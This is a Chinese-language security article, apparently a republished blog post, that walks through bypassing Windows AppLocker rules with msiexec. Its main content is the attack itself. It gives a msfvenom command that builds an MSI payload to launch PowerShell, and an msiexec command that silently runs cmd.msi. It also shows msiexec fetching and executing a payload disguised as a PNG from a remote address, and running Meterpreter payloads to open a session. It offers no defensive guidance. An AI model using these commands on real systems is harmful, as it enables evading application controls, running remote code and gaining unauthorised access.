繞過AppLocker系列之MSIEXEC的利用

發布日期:2017-06-23首頁 > 安全資(zī)訊

MSIEXEC是Windows操作系統中(zhōng)的一(yī)個實用程序,可用于從命令行安裝或配置産品。 如果環境配置不正确,則使用.MSI文件就可以允許攻擊者執行權限升級或繞過AppLocker規則。 本文的以下(xià)内容表明,當系統配置爲不阻止所有用戶執行MSI文件時,那麽系統就得不到正确的保護,因爲任何一(yī)個AppLocker的可執行規則都可以輕松繞過。

可以使用Metasploit 的MsfVenom來生(shēng)成用于執行命令或有效載荷的.MSI文件。

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes

繞過AppLocker系列之MSIEXEC的利用

使用 MsfVenom 生(shēng)成 MSI 文件 

運行powershell.msi 将會打開(kāi)一(yī)個PowerShell會話(huà),這樣就可以繞過AppLocker的規則了,即使已經設置了所有用戶都不可以執行PowerShell。

繞過AppLocker系列之MSIEXEC的利用

利用MSIEXEC 運行 PowerShell

同樣可以利用這種方式運行cmd命令,即使Windows系統已經阻止了cmd命令的執行。

msiexec /quiet /i cmd.msi

繞過AppLocker系列之MSIEXEC的利用

執行上述命令後,就會彈出cmd的窗口。

繞過AppLocker系列之MSIEXEC的利用

另外(wài),msiexec實用程序還可以運行已經重命名過的MSI文件,比如重命名爲PNG的MSI文件。 這些文件可以在命令提示符中(zhōng)本地執行或從遠程執行,當然也可以繞過AppLocker規則執行。

msiexec /q /i http://192.168.100.3/tmp/cmd.png

繞過AppLocker系列之MSIEXEC的利用

利用MSIEXEC執行PNG文件,彈出cmd

上述操作同樣可以用在Meterpreter payload 執行MSI文件上。

繞過AppLocker系列之MSIEXEC的利用

利用MSI 執行 Meterpreter Payload

繞過AppLocker系列之MSIEXEC的利用

利用MSIEXEC獲得Meterpreter 會話(huà)